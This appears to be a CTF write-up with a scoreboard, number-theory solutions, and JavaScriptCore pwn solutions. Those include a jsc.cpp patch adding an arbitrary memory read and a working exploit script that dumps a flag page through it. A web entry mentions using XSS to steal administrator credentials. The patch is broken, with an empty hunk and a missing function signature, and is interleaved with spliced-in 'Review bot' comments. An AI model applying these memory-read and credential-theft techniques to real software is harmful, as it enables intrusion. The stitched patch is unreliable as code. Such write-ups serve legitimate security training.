# Jack’s 2023 New Year CTF WriteUp

1 bml 456 84.56 Y
2 xtex 415 39.15 Y
3 QY 396 38.96 Y
4 Yuzhen 366 19.66 Y
5 FlyingSky 366 18.66 Y
6 undefined 296 8.96 Y
7 morty 296 7.96
8 predit 215 7.15
9 ricky8955555 166 6.66 Y
10 Sakii 67 5.67

# Math

## Euler

p = 2^{82589933}-1，p是素数。

a = 1046773254920148904775273163043，a是素数。

p为素数时，\phi (p) = p-1

a^{p+1} \equiv a^{p-1+2} \equiv a^{\phi(p)+2} \equiv a^{2} (\bmod p)

## Order

3^{(2^{82589933}-2) \times 464808334276175608222914454469 + 10} (\bmod (2^{82589933}-1) \times 929616668552351216445828908939)

p_1 = 2^{82589933}-1, p_2 = 929616668552351216445828908939。它们都是素数。

3^{(p_1 - 1) \times \frac{p_2 - 1}{2} + 10} (\bmod p_1 p_2)

m, n都是大于1的整数，且(a,m) = 1, (m,n) = 1时，ord_{mn}(a) = [ord_{m}(a), ord_{n}(a)]

3^{(p_1 - 1) \times \frac{p_2 - 1}{2}} \equiv 3^{ord_{p_1}(3) \times k \, ord_{p_2}(3)} \equiv 3^{k \times ord_{p_1 p_2}(3)} \equiv (3^{ord_{p_1 p_2}(3)})^{k} \equiv 1 (\bmod p_1 p_2)

# Pwn

## jsc_builtin

// The jsc shell exposes a read() built-in (see jsc.cpp, reference [3]), so this
// challenge presumably reduces to asking the shell for the flag file directly.
const flagPath = "flag";
read(flagPath);


## jsc_ar

jsc_ar.patch:

diff --git a/Source/JavaScriptCore/jsc.cpp b/Source/JavaScriptCore/jsc.cpp
index 897f095f6335..422e366c63ea 100644
--- a/Source/JavaScriptCore/jsc.cpp
+++ b/Source/JavaScriptCore/jsc.cpp
@@ -83,6 +83,9 @@
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <unistd.h>
#include <type_traits>
#include <wtf/CPUTime.h>
#include <wtf/FileSystem.h>
@@ -294,6 +297,7 @@ static JSC_DECLARE_HOST_FUNCTION(functionMemoryUsageStatistics);
static JSC_DECLARE_HOST_FUNCTION(functionCreateMemoryFootprint);
static JSC_DECLARE_HOST_FUNCTION(functionResetMemoryPeak);
static JSC_DECLARE_HOST_FUNCTION(functionVersion);
static JSC_DECLARE_HOST_FUNCTION(functionRun);
static JSC_DECLARE_HOST_FUNCTION(functionRunString);
@@ -542,18 +546,19 @@ private:
@@ -701,6 +706,10 @@ private:
this->putDirectCustomAccessor(vm, identifier, custom, PropertyAttribute::DontEnum | PropertyAttribute::DontDelete | PropertyAttribute::CustomValue);
}
}
+
+        int fd = open("flag", O_RDONLY);
+        mmap((void *) 0x100000000000, 0x1000, PROT_READ, MAP_PRIVATE, fd, 0);
+        close(fd);
}
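Review bot: The return values of `open` and `mmap` on the added lines are never checked, so a missing `flag` file leaves `fd == -1`, makes `mmap` fail, and then calls `close(-1)`, while the object is still set up as if the mapping existed. The address is also only a hint because neither `MAP_FIXED` nor `MAP_FIXED_NOREPLACE` is passed, so the kernel may place the mapping elsewhere without any error. Suggest wrapping the mapping in a guard such as `if (fd >= 0) { void* p = mmap(...); /* compare p against MAP_FAILED and the requested address */ close(fd); }`. The enclosing function starts before the hunk, so its name and return type are not visible here.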

public:
@@ -1512,6 +1521,16 @@ JSC_DEFINE_HOST_FUNCTION(functionAddressOf, (JSGlobalObject*, CallFrame* callFra
return returnValue;
}

+{
+    if (callFrame->argumentCount() == 1) {
+        JSValue target = callFrame->uncheckedArgument(0);
+        return JSValue::encode(JSBigInt::createFrom(globalObject, *(uint64_t *)JSBigInt::toBigUInt64(target.asHeapBigInt())));
+    }
+    return JSValue::encode(jsUndefined());
+}
+
+
JSC_DEFINE_HOST_FUNCTION(functionVersion, (JSGlobalObject*, CallFrame*))
{
// We need this function for compatibility with the Mozilla JS tests but for now
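Review bot: `target.asHeapBigInt()` on the added return line is reached without checking the argument's type, so a non-BigInt argument (or a BigInt32 on builds where that inline representation is enabled) is mis-cast before `toBigUInt64` runs; guard it with `if (!target.isHeapBigInt()) return JSValue::encode(jsUndefined());` ahead of the read. The `JSC_DEFINE_HOST_FUNCTION(...)` signature line of this new host function is missing from the hunk (the header counts 16 additions but nine are shown), so its name can only be inferred as `arbitraryRead` from the exploit below. A short comment on the function stating that it dereferences whatever address the caller passes, with no bounds or mapping check, would also help anyone reading the patched jsc.cpp.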



Exp:

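// Dump the 0x1000-byte page that jsc_ar.patch maps at 0x100000000000 from the
// "flag" file, one 64-bit word at a time through the arbitraryRead() host
// function the patch adds, and print its contents as text.
const MAP_BASE = 0x100000000000n;   // mmap() address in jsc_ar.patch
const MAP_SIZE = 0x1000n;           // mmap() length in jsc_ar.patch
const WORD_BYTES = 0x8n;

// Hex digits of one 64-bit word, reordered into memory (little-endian) order.
// padStart is required: toString(16) drops leading zeros, so a word whose top
// byte is below 0x10 would otherwise give an odd-length string and every byte
// pair taken from it would be split in the middle of a byte.
function wordToMemoryHex(word) {
    const bigEndian = word.toString(16).padStart(16, "0");
    let littleEndian = "";
    for (let j = bigEndian.length - 2; j >= 0; j -= 2) {
        littleEndian += bigEndian.slice(j, j + 2);
    }
    return littleEndian;
}

// Decode a hex string to text. NUL bytes are skipped: the mapping is zero-filled
// past the end of the file, and the flag text itself is not expected to contain
// NUL (the original code skipped all-zero words for the same reason).
function hexToText(hex) {
    let text = "";
    for (let i = 0; i < hex.length; i += 2) {
        const byte = parseInt(hex.slice(i, i + 2), 16);
        if (byte !== 0) {
            text += String.fromCharCode(byte);
        }
    }
    return text;
}

let hexFlag = "";
for (let offset = 0n; offset < MAP_SIZE; offset += WORD_BYTES) {
    hexFlag += wordToMemoryHex(arbitraryRead(MAP_BASE + offset));
}
let flag = hexToText(hexFlag);
print(flag);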


# Web

## OneLine

XSS拿管理员的用户名和口令登入查看flag。

# 参考资料

[1] https://renjikai.com/jacks-2022-new-year-ctf-writeup/
[2] http://hi.pcmoe.net/roar.html
[3] https://github.com/WebKit/WebKit/blob/main/Source/JavaScriptCore/jsc.cpp#L566